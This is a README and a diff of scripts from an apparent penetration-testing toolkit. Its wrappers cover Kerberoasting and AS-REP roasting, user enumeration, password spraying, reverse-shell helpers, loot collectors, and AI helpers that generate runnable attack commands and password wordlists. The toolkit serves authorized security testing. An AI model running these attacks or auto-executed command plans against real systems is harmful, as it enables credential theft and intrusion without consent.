Automation (bin/automation/) — see HOWTO: Automation & Orchestration, Dashboard, Manifest
- auto_recon.sh <target> [--no-udp]
- parse_nmap_open_ports.sh <*.gnmap>
- report_summary.py <*.gnmap ...>
- web_recon.sh <target|--url <url>>
- loot_pack.sh [dir]
- wide_web_recon.sh <hosts.txt>
- notes_init.sh <target>
- notes_attach.sh <target>
- full_pipeline.sh <domain|hosts.txt> [--resume|--force]
- manifest.py (init|set|get|addlist|show|task|taskstatus|taskreset) <target> [...]
- dashboard.py [--json]
- resume_all.py — resume full pipeline across all targets
- tech_actions.py <target> [--run] — suggest/run next steps based on httpx techs
- cleanup_scans.sh [dir] [days] [--force] — prune old scan files
- proxy_toggle.sh on|off [http://host:port]
- tmux_init.sh [session] — starter tmux layout
See also in HOWTO.md:
- Automation & Orchestration
- Dashboard (Status & Evidence)
- Manifest (State & Resume)
Examples
```
# Oneclick pipeline (resumeaware)
full_pipeline.sh target.htb
# Agentdriven full pipeline with auto tech actions
agent full target.htb
# Dashboard
dashboard --compact
# Resume all incomplete targets
resumeall
```
Web helpers (bin/web/) — see HOWTO: Web Recon & Routing
- dirbuster.sh <url> [wordlist] [exts] — ffuf directory fuzz
- vhost_ffuf.sh <base-url> <domain> [wordlist] — virtual hosts
- param_fuzz.sh <url-with-FUZZ> [wordlist] — parameter discovery
- lfi_tester.py <url-with-PLACEHOLDER> — basic LFI checks
- tech_detect.sh <url> — headers + tech hints
- http_headers.sh <url> — raw headers
- url_titles.py <url1> [url2 ...] — titles and codes
- crawl_words.py <url> [depth] — extract words for wordlists
- sqli_quick.sh <url> <param> — sqlmap wrapper
- backup_hunter.sh <base-url> [paths.txt] — find common backups/configs
- git_dumper.sh <base-url> [outdir] — mirror exposed .git and restore
- cors_tester.py <url> [origin] — test ACAO/ACAC
- methods.sh <url> — show allowed methods (OPTIONS)
- clone_site.sh <url> [outdir] — wget mirror
- tls_scan.sh <host:443> — openssl-based TLS info
- robots_grabber.sh <base-url> — show Disallow entries
- webdav_detect.sh <url> — OPTIONS + PROPFIND
- httpx_probe.sh <host|file>
- nuclei_quick.sh <url|file> [tags]
- gobuster_dir.sh <url> [wordlist] [exts] [threads]
- httpx_to_nuclei.sh <host|file> [--severity auto|crit|high|med|low] [--tags tags]
- httpx_tech_route.py <host|file> [--tech list] [--dry-run]
- httpx_presets.sh <profile> <host|file>
- gobuster_vhost.sh <url> [wordlist] [threads]
- wpscan_quick.sh <wordpress-url>
- jenkins_quick.sh <jenkins-url>
- sonarqube_quick.sh <sonarqube-url>
- magento_quick.sh <magento-url>
- droopescan_quick.sh <url>
- joomscan_quick.sh <joomla-url>
See also in HOWTO.md:
- Web Recon & Routing
Examples
```
# Alive → nuclei with auto severity
httpx_to_nuclei.sh hosts.txt
# Route by technology and run extras
httpx_tech_route.py urls.txt --tech wordpress,drupal --wpscan --extra
# Vhost brute and directory brute
gobuster_vhost.sh http://$TARGET/ /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
gobuster_dir.sh http://$TARGET/ /usr/share/wordlists/dirb/common.txt php,txt 50
```
Reverse shells (bin/shells/)
- revsh.py <lhost> <lport> — prints common one-liners
- listener.sh <port> — rlwrap + nc/ncat listener
- tty_upgrade.sh — quick TTY tips
Examples
```
# Listener
listener.sh 4444
# Oneliners to paste on target
revsh.py YOUR_IP 4444
# Upgrade TTY
tty_upgrade.sh
```
File transfer (bin/transfer/)
- http_serve.sh [port] — simple Python HTTP server
- serve.py [port] — HTTP server with web upload (POST /upload)
- push_http.sh <file> <http://host:port/upload> — upload to serve.py
- dl_oneshots.sh <lhost> <port> <filename> — download one-liners
- smb_server.sh [share] [path] — impacket SMB server
Examples
```
# Simple HTTP
http_serve.sh 8000
# Upload server and push
serve.py 8000
push_http.sh loot.txt http://YOUR_IP:8000/upload
# SMB quick share
smb_server.sh share ./loot
```
Crypto / Text (bin/crypto/)
- encoders.py b64e|b64d|urle|urld|hex|unhex|xor|rot
- jwt_show.py <jwt> — decode header/payload (no verify)
Examples
```
encoders.py b64e 'secret'; encoders.py urle 'a b'
jwt_show.py eyJhbGciOi...
```
Privilege Escalation (bin/privesc/)
- linux_quick_enum.sh — basic local recon
- suid_scan.sh — list SUID/SGID
- caps_scan.sh — list file capabilities
Examples
```
linux_quick_enum.sh
caps_scan.sh
```
Misc (bin/misc/)
- cyclic.py create <len> | offset <needle> — pattern + offset
- port_forward.sh — wrappers for ssh -L/-R/-D
- extract_urls.py <file...>
Examples
```
cyclic.py create 4000 | cyclic.py offset Aa0A
port_forward.sh -L 8080:127.0.0.1:80 user@host
extract_urls.py notes.md
```
AI (bin/ai/) — see HOWTO: AI Integrations
- ask.py [-m model] [-s system] "prompt" | - (stdin)
- wordlist_from_context.py <target> [context-file|-]
- orchestrate_web.py <hosts.txt>
- review_findings.py <notes.md> [extra]
- commands_planner.py "goal" [context]
- agent_orchestrator.py <task> — multi-agent runner (web|notes|post|ad)
See also in HOWTO.md:
- AI Integrations
Examples
```
# Plan commands from a goal + context
commands_planner.py "Probe admin portals" urls.txt
# Orchestrate web for a host list
orchestrate_web.py hosts.txt
# Multiagent runner
agent web hosts.txt
```
Active Directory (bin/ad/)
- getnpusers_wrapper.sh <domain/user:pass> <dc_ip> [userlist.txt]
- getspns_wrapper.sh <domain/user:pass> <dc_ip>
- ldap_quick_users.sh <ip> <baseDN> [user pass]
- rpc_quick.sh <host> [user pass] — rpcclient lsa/users/groups
- kerbrute_wrapper.sh <domain> <users.txt> [dc-ip]
- cme_quick.sh <host> [user pass]
Examples
```
getnpusers_wrapper.sh domain/user:pass 10.10.10.5 users.txt
getspns_wrapper.sh domain/user:pass 10.10.10.5
rpc_quick.sh $TARGET
kerbrute_wrapper.sh domain users.txt 10.10.10.5
cme_quick.sh $TARGET user pass
```
Passwords (bin/passwords/)
- mutate_words.py word1 [word2 ...] | -
- spray_http_basic.sh <url> <users.txt> <password>
- merge_dedupe.sh <file1> [file2 ...] — dedup merged lists
- wordlist_cleanup.sh <wordlist> [min] [max]
- hash_id.sh <hash> — simple guess when hashid missing
Examples
```
mutate_words.py "acme" "winter"
merge_dedupe.sh list1.txt list2.txt > merged.txt
wordlist_cleanup.sh merged.txt 8 64 > cleaned.txt
spray_http_basic.sh http://$TARGET/protected users.txt Winter2025!
```
Windows (bin/windows/)
- privesc_quick.ps1 — run on target
- win_share_enum.ps1 -Target <host>
- find_unquoted_services.ps1 — potential service path issues
- find_path_writable.ps1 — writable PATH dirs
- windows_loot.ps1 — targeted loot collector
Examples
```
powershell -ep bypass -f bin/windows/privesc_quick.ps1
powershell -ep bypass -f bin/windows/win_share_enum.ps1 -Target $TARGET
powershell -ep bypass -f bin/windows/find_unquoted_services.ps1
```
Post-Exploitation (bin/post/)
- linux_loot.sh — targeted loot collector with size caps
- windows_loot.ps1 — targeted loot collector (PowerShell)
- pack_report.sh <target> — merge loot/scans into markdown report
Examples
```
LOOT_DIR=/tmp/loot MAX_SIZE=10485760 INCLUDE_DB=1 bin/post/linux_loot.sh
bin/post/pack_report.sh $TARGET
```
DNS (bin/dns/)
- zone_transfer.sh <domain> [ns]
- subenum.sh <domain>
- gobuster_dns.sh <domain> [wordlist] [threads]
Examples
```
zone_transfer.sh target.htb
gobuster_dns.sh target.htb /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt 100
```
Scanning (bin/scan/)
- naabu_quick.sh <target> [flags]
- masscan_top.sh <target> [rate]
Examples
```
naabu_quick.sh $TARGET -p 1-65535
masscan_top.sh $TARGET 20000
```
Tunnels (bin/tunnel/)
- chisel_server.sh <port>
- chisel_client.sh <host:port> R:<lport>:<rhost>:<rport>
- autossh_socks.sh <user@host> [lport]
- socat_forward.sh -L|-R <lport> <rhost> <rport>
Examples
```
autossh_socks.sh user@pivot 1080
chisel_server.sh 8000 &
chisel_client.sh YOUR_IP:8000 R:8080:127.0.0.1:80
```
Pwn (bin/pwn/)
- pwntools_template.py — starter exploit template
Examples
```
python3 bin/pwn/pwntools_template.py REMOTE=1 HOST=$TARGET PORT=31337
```
Hashes (bin/hashes/)
- extract_ntlm_from_secretsdump.py <file> [out]
- john_pfx.sh <file.pfx> — john format for PFX
Examples
```
extract_ntlm_from_secretsdump.py secretsdump.out ntlm.txt
john_pfx.sh cert.pfx > pfx.hash
```
Tips
- OUTDIR controls where scans are saved; set by settarget.
- Most scripts accept TARGET via env if argument omitted.
- If a tool isnt installed (ffuf, getcap, ldapsearch, snmpwalk), install it or adjust the command.
- For AI helpers, set OPENAI_API_KEY or run a local Ollama server.
- Use responsibly and only with explicit authorization.
- Dashboard flags: --no-color, --compact, --json
- Read HOWTO.md for detailed guidance and examples.

14
bin/ad/cme_quick.sh Executable file
View File

@@ -0,0 +1,14 @@
#!/usr/bin/env bash
set -euo pipefail
host=${1:-${TARGET:-}}
user=${2:-}
pass=${3:-}
[[ -z "$host" ]] && { echo "Usage: $(basename "$0") <host> [user] [pass] (requires crackmapexec)" >&2; exit 1; }
if ! command -v crackmapexec >/dev/null 2>&1; then echo "[!] crackmapexec not found" >&2; exit 2; fi
if [[ -n "$user" ]]; then
crackmapexec smb "$host" -u "$user" -p "$pass" --shares --sessions --loggedon-users || true
else
crackmapexec smb "$host" -u '' -p '' --shares --sessions || true
fi
echo "[!] Beware of lockout policies when authenticating."

22
bin/ad/getnpusers_wrapper.sh Executable file
View File

@@ -0,0 +1,22 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){ echo "Usage: $(basename "$0") <domain>/<user>:<pass> <dc_ip> [userlist.txt]" >&2; exit 1; }
creds=${1:-}
dc=${2:-}
userlist=${3:-}
[[ -z "$creds" || -z "$dc" ]] && usage
if ! command -v getNPUsers.py >/dev/null 2>&1; then
echo "[!] impacket not found (getNPUsers.py). Install impacket." >&2
exit 2
fi
if [[ -n "${userlist:-}" ]]; then
getNPUsers.py -no-pass -dc-ip "$dc" "$creds" -usersfile "$userlist" -format hashcat -outputfile asrep_hashes.txt
else
getNPUsers.py -no-pass -dc-ip "$dc" "$creds" -format hashcat -outputfile asrep_hashes.txt
fi
echo "[+] Saved AS-REP hashes to asrep_hashes.txt"

17
bin/ad/getspns_wrapper.sh Executable file
View File

@@ -0,0 +1,17 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){ echo "Usage: $(basename "$0") <domain>/<user>:<pass> <dc_ip>" >&2; exit 1; }
creds=${1:-}
dc=${2:-}
[[ -z "$creds" || -z "$dc" ]] && usage
if ! command -v GetUserSPNs.py >/dev/null 2>&1; then
echo "[!] impacket not found (GetUserSPNs.py). Install impacket." >&2
exit 2
fi
GetUserSPNs.py -dc-ip "$dc" -request "$creds" -outputfile kerberoast_hashes.txt
echo "[+] Saved Kerberoast hashes to kerberoast_hashes.txt"

13
bin/ad/kerbrute_wrapper.sh Executable file
View File

@@ -0,0 +1,13 @@
#!/usr/bin/env bash
set -euo pipefail
domain=${1:-}
userlist=${2:-}
dc=${3:-}
[[ -z "$domain" || -z "$userlist" ]] && { echo "Usage: $(basename "$0") <domain> <userlist.txt> [dc-ip] (requires kerbrute)" >&2; exit 1; }
if ! command -v kerbrute >/dev/null 2>&1; then echo "[!] kerbrute not found" >&2; exit 2; fi
if [[ -n "$dc" ]]; then
exec kerbrute userenum -d "$domain" --dc "$dc" "$userlist"
else
exec kerbrute userenum -d "$domain" "$userlist"
fi

18
bin/ad/ldap_quick_users.sh Executable file
View File

@@ -0,0 +1,18 @@
#!/usr/bin/env bash
set -euo pipefail
ip=${1:-${TARGET:-}}
base=${2:-}
[[ -z "$ip" || -z "$base" ]] && { echo "Usage: $(basename "$0") <ip> <baseDN> [user [pass]]" >&2; exit 1; }
user=${3:-}
pass=${4:-}
args=(-H "ldap://$ip" -b "$base" -LLL)
if [[ -n "$user" ]]; then
args+=(-x -D "$user" -w "$pass")
else
args+=(-x)
fi
ldapsearch "${args[@]}" '(objectClass=person)' sAMAccountName mail userPrincipalName 2>/dev/null | awk '/^sAMAccountName:/{print $2}'

21
bin/ad/rpc_quick.sh Executable file
View File

@@ -0,0 +1,21 @@
#!/usr/bin/env bash
set -euo pipefail
host=${1:-${TARGET:-}}
user=${2:-}
pass=${3:-}
[[ -z "$host" ]] && { echo "Usage: $(basename "$0") <host> [user] [pass]" >&2; exit 1; }
if ! command -v rpcclient >/dev/null 2>&1; then
echo "[!] rpcclient not found" >&2; exit 2
fi
echo "[+] rpcclient enum on $host"
if [[ -n "$user" ]]; then
auth=(-U "$user%$pass")
else
auth=(-N)
fi
rpcclient "${auth[@]}" "$host" -c 'lsaquery; lookupnames Administrator; enumdomusers; enumdomgroups' || true

34
bin/ai/_ai_utils.py Executable file
View File

@@ -0,0 +1,34 @@
#!/usr/bin/env python3
import os, json, requests, time
def ai_complete(prompt, system='You are a helpful pentest copilot.', temperature=0.2, max_chars=12000, retries=2, timeout=60):
text = prompt[-max_chars:] if len(prompt) > max_chars else prompt
provider = os.environ.get('PROVIDER') or ('openai' if os.environ.get('OPENAI_API_KEY') else 'ollama')
last_err = ''
for _ in range(retries):
try:
if provider == 'openai' and os.environ.get('OPENAI_API_KEY'):
url = 'https://api.openai.com/v1/chat/completions'
headers = {'Authorization': f"Bearer {os.environ['OPENAI_API_KEY']}", 'Content-Type':'application/json'}
body = {'model': os.environ.get('OPENAI_MODEL','gpt-4o-mini'),
'messages':[{'role':'system','content':system},{'role':'user','content':text}],
'temperature':temperature}
r = requests.post(url, headers=headers, data=json.dumps(body), timeout=timeout)
if r.ok:
return r.json()['choices'][0]['message']['content']
last_err = f"HTTP {r.status_code}: {r.text[:200]}"
else:
host = os.environ.get('OLLAMA_HOST', 'http://localhost:11434')
model = os.environ.get('OLLAMA_MODEL', 'llama3.1')
r = requests.post(f'{host}/api/chat', json={'model':model,'messages':[{'role':'system','content':system},{'role':'user','content':text}]}, timeout=timeout)
if r.ok:
try:
return r.json()['message']['content']
except Exception:
return r.text
last_err = f"HTTP {r.status_code}: {r.text[:200]}"
except Exception as e:
last_err = str(e)
time.sleep(1)
return f"[AI error] {last_err}"

187
bin/ai/agent_orchestrator.py Executable file
View File

@@ -0,0 +1,187 @@
#!/usr/bin/env python3
import os, sys, subprocess, json, shutil, time
HELP = """Usage: agent_orchestrator.py <task> [args]
Tasks:
web <hosts.txt> [--force] # httpx -> nuclei -> screenshots -> AI plan (resume-aware)
full <domain|hosts.txt> # DNS -> httpx -> nuclei -> tech route (+wpscan)
notes <target> # init notes, attach artifacts
post <target> # run loot collectors + pack report
ad <host> [--force] # basic AD recon wrappers (resume-aware)
Env: OUTDIR, HTB_ROOT, OPENAI_API_KEY/OLLAMA_HOST (optional).
"""
def run(cmd, check=False):
print(f"[*] {cmd}")
return subprocess.call(cmd, shell=True) if isinstance(cmd, str) else subprocess.call(cmd)
def run_capture(cmd):
try:
return subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT, timeout=600).decode('utf-8','ignore')
except Exception as e:
return ''
def manifest_task(target, name, action, meta=None):
root = os.environ.get('HTB_ROOT')
if not target or not root:
return
cmd = ["bin/automation/manifest.py","task",target,name,action]
if meta:
cmd.append(json.dumps(meta))
run(cmd)
def manifest_status(target, name):
root = os.environ.get('HTB_ROOT')
if not target or not root:
return None
code = subprocess.call(["bin/automation/manifest.py","taskstatus",target,name])
if code == 0:
return 'ok'
elif code == 2:
return 'running'
return None
def task_web(hosts, force=False):
outdir=os.environ.get('OUTDIR','scans')
os.makedirs(outdir, exist_ok=True)
ts=time.strftime('%Y%m%d_%H%M%S')
urls=f"{outdir}/agent_urls_{ts}.txt"
target=os.environ.get('TARGET')
# Probe
if shutil.which('httpx'):
if not force and manifest_status(target, 'web_httpx') == 'ok':
print('[=] Resume: skipping web_httpx (already ok)')
else:
t0=time.time()
run(f"httpx -silent -l {hosts} -ports 80,81,88,443,3000,5000,7001,7002,8000,8008,8080,8081,8088,8443,8888,9000 -status-code -title -tech-detect -asn -ip -hash -server | sed 's/ .*$//' | sort -u > {urls}")
manifest_task(target, 'web_httpx', 'ok', {'urls_file': urls, 'elapsed_sec': int(time.time()-t0)})
else:
print('[!] httpx missing; using wide_web_recon.sh')
run(["bin/automation/wide_web_recon.sh", hosts])
return
# Nuclei
if shutil.which('nuclei'):
if not force and manifest_status(target, 'web_nuclei') == 'ok':
print('[=] Resume: skipping web_nuclei (already ok)')
else:
t0=time.time()
run(["bin/web/nuclei_quick.sh", urls])
manifest_task(target, 'web_nuclei', 'ok', {'elapsed_sec': int(time.time()-t0)})
# Screenshots
if shutil.which('gowitness'):
if not force and manifest_status(target, 'web_shots') == 'ok':
print('[=] Resume: skipping web_shots (already ok)')
else:
t0=time.time()
run(f"gowitness file -f {urls} -P {outdir}/gowitness_{ts}")
manifest_task(target, 'web_shots', 'ok', {'dir': f"{outdir}/gowitness_{ts}", 'elapsed_sec': int(time.time()-t0)})
# Plan via AI (optional)
if shutil.which('python3') and (os.environ.get('OPENAI_API_KEY') or os.environ.get('OLLAMA_HOST')):
if not force and manifest_status(target, 'web_plan') == 'ok':
print('[=] Resume: skipping web_plan (already ok)')
else:
t0=time.time()
plan=run_capture(["bin/ai/commands_planner.py","Web recon next steps",urls])
if plan:
path=f"{outdir}/agent_plan_{ts}.txt"
with open(path,"w") as f: f.write(plan)
print(f"[+] Plan saved: {path}")
manifest_task(target, 'web_plan', 'ok', {'plan': path, 'elapsed_sec': int(time.time()-t0)})
def task_notes(target, force=False):
if not force and manifest_status(target, 'notes_init') == 'ok':
print('[=] Resume: skipping notes_init (already ok)')
else:
t0=time.time()
run(["bin/automation/notes_init.sh", target])
manifest_task(target, 'notes_init', 'ok', {'elapsed_sec': int(time.time()-t0)})
if not force and manifest_status(target, 'notes_attach') == 'ok':
print('[=] Resume: skipping notes_attach (already ok)')
else:
t0=time.time()
run(["bin/automation/notes_attach.sh", target])
manifest_task(target, 'notes_attach', 'ok', {'elapsed_sec': int(time.time()-t0)})
def task_post(target, force=False):
# Linux loot
if not force and manifest_status(target, 'post_linux_loot') == 'ok':
print('[=] Resume: skipping post_linux_loot (already ok)')
else:
t0=time.time()
run(["bash","-lc",f"TARGET={target} bin/post/linux_loot.sh || true"])
manifest_task(target, 'post_linux_loot', 'ok', {'elapsed_sec': int(time.time()-t0)})
# Report pack
if not force and manifest_status(target, 'post_report') == 'ok':
print('[=] Resume: skipping post_report (already ok)')
else:
t0=time.time()
run(["bash","-lc",f"TARGET={target} bin/post/pack_report.sh {target}"])
manifest_task(target, 'post_report', 'ok', {'elapsed_sec': int(time.time()-t0)})
def task_ad(args, force=False):
host=args[0]
target=os.environ.get('TARGET')
if shutil.which('enum4linux-ng'):
if not force and manifest_status(target, 'ad_enum4linux') == 'ok':
print('[=] Resume: skipping ad_enum4linux (already ok)')
else:
t0=time.time()
run(["bin/smb/enum4linux_ng.sh", host])
manifest_task(target, 'ad_enum4linux', 'ok', {'elapsed_sec': int(time.time()-t0)})
if not force and manifest_status(target, 'ad_smbmap') == 'ok':
print('[=] Resume: skipping ad_smbmap (already ok)')
else:
t0=time.time()
run(["bin/smb/smbmap_quick.sh", host])
manifest_task(target, 'ad_smbmap', 'ok', {'elapsed_sec': int(time.time()-t0)})
if not force and manifest_status(target, 'ad_rpc') == 'ok':
print('[=] Resume: skipping ad_rpc (already ok)')
else:
t0=time.time()
run(["bin/ad/rpc_quick.sh", host])
manifest_task(target, 'ad_rpc', 'ok', {'elapsed_sec': int(time.time()-t0)})
def main():
if len(sys.argv) < 2:
print(HELP); sys.exit(1)
task=sys.argv[1]
args=sys.argv[2:]
if task=="web" and args:
force = ('--force' in args)
task_web(args[0], force=force)
elif task=="full" and args:
# small state-machine: run resume pipeline; if tasks not ok, try again (max 3 passes)
target = os.environ.get('TARGET')
manifest_task(target, 'full_pipeline', 'start', {'input': args[0]})
for i in range(3):
run(["bin/automation/full_pipeline.sh", args[0], "--resume"]) # idempotent
# check statuses
dns=manifest_status(target,'dns')
httpx=manifest_status(target,'httpx')
nuclei=manifest_status(target,'nuclei')
tech=manifest_status(target,'techroute')
wp=manifest_status(target,'wpscan')
if all(s=='ok' or s is None for s in [dns,httpx,nuclei,tech,wp]):
manifest_task(target, 'full_pipeline', 'ok')
# After pipeline is complete, run tech_actions to chain evidence -> action
if manifest_status(target, 'tech_actions') != 'ok':
manifest_task(target, 'tech_actions', 'start')
run(["bin/automation/tech_actions.py", target, "--run"])
manifest_task(target, 'tech_actions', 'ok')
break
else:
manifest_task(target, 'full_pipeline', 'fail', {'reason':'incomplete after retries'})
elif task=="notes" and args:
force = ('--force' in args)
task_notes(args[0], force=force)
elif task=="post" and args:
force = ('--force' in args)
task_post(args[0], force=force)
elif task=="ad" and args:
force = ('--force' in args)
task_ad(args, force=force)
else:
print(HELP); sys.exit(1)
if __name__=='__main__':
main()

73
bin/ai/ask.py Executable file
View File

@@ -0,0 +1,73 @@
#!/usr/bin/env python3
import os, sys, json, requests
def usage():
print("Usage: ask.py [-m model] [-s system] [prompt | -]", file=sys.stderr)
print("Env:")
print(" PROVIDER=openai|ollama (default: openai if OPENAI_API_KEY set else ollama)")
print(" OPENAI_API_KEY, OPENAI_MODEL (default: gpt-4o-mini)")
print(" OLLAMA_HOST (default: http://localhost:11434), OLLAMA_MODEL (default: llama3.1)")
sys.exit(1)
model = None
system = os.environ.get('AI_SYSTEM', 'You are a helpful pentest copilot.')
args = sys.argv[1:]
while args and args[0].startswith('-'):
if args[0] == '-m' and len(args) > 1:
model = args[1]; args = args[2:]
elif args[0] == '-s' and len(args) > 1:
system = args[1]; args = args[2:]
else:
usage()
if not args:
usage()
prompt = args[0]
if prompt == '-':
prompt = sys.stdin.read()
provider = os.environ.get('PROVIDER')
if not provider:
provider = 'openai' if os.environ.get('OPENAI_API_KEY') else 'ollama'
if provider == 'openai':
key = os.environ.get('OPENAI_API_KEY')
if not key:
print('[!] OPENAI_API_KEY not set; fallback to ollama?', file=sys.stderr)
provider = 'ollama'
else:
model = model or os.environ.get('OPENAI_MODEL', 'gpt-4o-mini')
url = 'https://api.openai.com/v1/chat/completions'
headers = {'Authorization': f'Bearer {key}', 'Content-Type': 'application/json'}
body = {
'model': model,
'messages': [
{'role': 'system', 'content': system},
{'role': 'user', 'content': prompt}
],
'temperature': 0.2,
}
r = requests.post(url, headers=headers, data=json.dumps(body), timeout=60)
r.raise_for_status()
print(r.json()['choices'][0]['message']['content'].strip())
sys.exit(0)
# ollama
host = os.environ.get('OLLAMA_HOST', 'http://localhost:11434')
model = model or os.environ.get('OLLAMA_MODEL', 'llama3.1')
url = f'{host}/api/chat'
body = {'model': model, 'messages': [{'role': 'system', 'content': system}, {'role': 'user', 'content': prompt}]}
r = requests.post(url, json=body, timeout=60)
if r.ok:
data = r.json()
# responses is either 'message' or 'messages'
if 'message' in data and 'content' in data['message']:
print(data['message']['content'].strip())
else:
# naive fallback
print(json.dumps(data, indent=2))
else:
print(f'[!] Ollama request failed: {r.status_code}', file=sys.stderr)
sys.exit(2)

24
bin/ai/commands_planner.py Executable file
View File

@@ -0,0 +1,24 @@
#!/usr/bin/env python3
import os, sys
from _ai_utils import ai_complete
def usage():
print(f"Usage: {sys.argv[0]} <goal-text> [context-file|-]", file=sys.stderr)
sys.exit(1)
if len(sys.argv) < 2:
usage()
goal = sys.argv[1]
ctx = ''
if len(sys.argv) > 2:
arg = sys.argv[2]
if arg == '-':
ctx = sys.stdin.read()
elif os.path.isfile(arg):
ctx = open(arg,'r',errors='ignore').read()
system = 'You output only bash commands and our toolkit scripts (bin/..). No explanations.'
prompt = f"Goal:\n{goal}\n\nContext:\n{ctx}\n\nConstraints: Use available wrappers (nmap_*, httpx_probe.sh, nuclei_quick.sh, dirbuster.sh, etc.). Output a ready-to-run bash command list."
print(ai_complete(prompt, system=system).strip())

38
bin/ai/orchestrate_web.py Executable file
View File

@@ -0,0 +1,38 @@
#!/usr/bin/env python3
import os, sys, json, subprocess, tempfile
from _ai_utils import ai_complete
HELP = """Usage: orchestrate_web.py <hosts.txt>
Reads hosts, probes with httpx (if present), proposes recon plan via AI, and emits suggested commands.
Env: OPENAI_API_KEY or OLLAMA_HOST; models via OPENAI_MODEL/OLLAMA_MODEL.
"""
def run(cmd):
try:
out = subprocess.check_output(cmd, stderr=subprocess.STDOUT, timeout=120)
return out.decode(errors='ignore')
except Exception as e:
return ''
if len(sys.argv) < 2:
print(HELP, file=sys.stderr); sys.exit(1)
hosts_file = sys.argv[1]
if not os.path.isfile(hosts_file):
print('[!] hosts file missing', file=sys.stderr); sys.exit(2)
httpx_out = ''
urls_file = None
if shutil := __import__('shutil') and shutil.which('httpx'):
httpx_out = run(['httpx','-silent','-l',hosts_file,'-ports','80,81,88,443,3000,5000,7001,7002,8000,8008,8080,8081,8088,8443,8888,9000','-status-code','-title','-tech-detect','-asn','-ip','-hash','-server'])
tf = tempfile.NamedTemporaryFile(delete=False, mode='w'); urls_file = tf.name
for line in httpx_out.splitlines():
parts = line.split(' ')
if parts:
tf.write(parts[0]+'\n')
tf.close()
context = f"HTTPX OUTPUT:\n{httpx_out}\n\nInstructions: Generate a prioritized web recon plan with concrete commands using provided toolkit scripts (bin/... wrappers). Keep it concise, bash-ready, and safe."
plan = ai_complete(context, system='You are a seasoned web pentest copilot.') or 'httpx not available; run web_recon.sh <host> manually.'
print(plan.strip())

16
bin/ai/review_findings.py Executable file
View File

@@ -0,0 +1,16 @@
#!/usr/bin/env python3
import os, sys
from _ai_utils import ai_complete
def usage():
print(f"Usage: {sys.argv[0]} <notes.md|textfile> [extra context file]", file=sys.stderr)
sys.exit(1)
if len(sys.argv) < 2:
usage()
text = open(sys.argv[1],'r',errors='ignore').read()
ctx = open(sys.argv[2],'r',errors='ignore').read() if len(sys.argv)>2 else ''
prompt = f"Notes:\n{text}\n\nExtra:\n{ctx}\n\nSummarize key findings (bullets), list exploitable vectors, immediate next steps, and any cred reuse or pivot ideas."
print(ai_complete(prompt, system='You extract key findings, risks, and next actions for a pentest.').strip())

91
bin/ai/wordlist_from_context.py Executable file
View File

@@ -0,0 +1,91 @@
#!/usr/bin/env python3
import os, sys, re, itertools, unicodedata
try:
import requests, json
except Exception:
requests = None
def normalize_words(text):
text = unicodedata.normalize('NFKC', text)
words = re.findall(r"[A-Za-z][A-Za-z0-9_\-]{2,}", text)
return sorted(set(w.strip("-_").lower() for w in words))
def mutate(words):
years = ['2020','2021','2022','2023','2024','2025']
suffixes = ['', '!', '@', '#', '1', '123', '321']
leet = str.maketrans({'a':'@','A':'@','e':'3','E':'3','i':'1','I':'1','o':'0','O':'0','s':'$','S':'$'})
out = set()
for w in words:
base = [w, w.capitalize(), w.upper()]
for b in base:
out.add(b)
out.add(b.translate(leet))
for y in years:
out.add(b + y)
out.add(b.translate(leet) + y)
for s in suffixes:
out.add(b + s)
return sorted(out)
def ask_ai(prompt, model=None):
provider = os.environ.get('PROVIDER')
if not provider:
provider = 'openai' if os.environ.get('OPENAI_API_KEY') else 'ollama'
if provider == 'openai' and os.environ.get('OPENAI_API_KEY'):
if requests is None:
return None
key = os.environ['OPENAI_API_KEY']
model = model or os.environ.get('OPENAI_MODEL', 'gpt-4o-mini')
url = 'https://api.openai.com/v1/chat/completions'
headers = {'Authorization': f'Bearer {key}', 'Content-Type': 'application/json'}
body = {'model': model, 'messages': [{'role':'system','content':'Generate a focused password wordlist.'},{'role':'user','content':prompt}], 'temperature':0.2}
r = requests.post(url, headers=headers, data=json.dumps(body), timeout=60)
if r.ok:
return r.json()['choices'][0]['message']['content']
return None
# ollama if available
if requests is None:
return None
host = os.environ.get('OLLAMA_HOST', 'http://localhost:11434')
model = model or os.environ.get('OLLAMA_MODEL', 'llama3.1')
url = f'{host}/api/chat'
body = {'model': model, 'messages': [{'role': 'system', 'content': 'Generate a focused password wordlist.'}, {'role': 'user', 'content': prompt}]}
r = requests.post(url, json=body, timeout=60)
if r.ok:
try:
return r.json()['message']['content']
except Exception:
return r.text
return None
def usage():
print(f"Usage: {sys.argv[0]} <domain-or-target> [context-file|-]", file=sys.stderr)
sys.exit(1)
if len(sys.argv) < 2:
usage()
target = sys.argv[1]
ctx = ''
if len(sys.argv) > 2:
arg = sys.argv[2]
if arg == '-':
ctx = sys.stdin.read()
elif os.path.isfile(arg):
ctx = open(arg, 'r', errors='ignore').read()
words = normalize_words(target + ' ' + ctx)
base = mutate(words)
ai = ask_ai(f"Target: {target}\nContext:\n{ctx}\nOutput a newline-delimited list of likely passwords and tokens. Avoid commentary.")
if ai:
# extract lines that look like words
lines = [l.strip() for l in ai.splitlines()]
ai_words = [l for l in lines if l and not l.startswith('#') and len(l) <= 64]
else:
ai_words = []
final = sorted(set(base + ai_words))
for w in final:
print(w)

66
bin/automation/auto_recon.sh Executable file
View File

@@ -0,0 +1,66 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){
cat >&2 <<USAGE
Usage: $(basename "$0") <target> [--no-udp]
Runs quick nmap, parses ports, kicks off full/udp, and basic web enum.
USAGE
exit 1
}
target=${1:-${TARGET:-}}
[[ -z "$target" ]] && usage
shift || true
do_udp=1
while [[ $# -gt 0 ]]; do
case "$1" in
--no-udp) do_udp=0; shift;;
*) shift; break;;
esac
done
outdir=${OUTDIR:-targets/${target}/scans}
mkdir -p "$outdir"
ts=$(date +%Y%m%d_%H%M%S)
log="$outdir/auto_recon_${ts}.log"
summary="$outdir/auto_recon_${ts}.summary.txt"
echo "[+] Starting quick scan" | tee -a "$log"
qbase="$outdir/${target}_quick_${ts}"
nmap -Pn -T4 -sC -sV -oA "$qbase" "$target" | tee -a "$log"
gnmap="$qbase.gnmap"
ports=$(bin/automation/parse_nmap_open_ports.sh "$gnmap" || true)
echo "[+] Open TCP ports: ${ports:-none}" | tee -a "$log" "$summary"
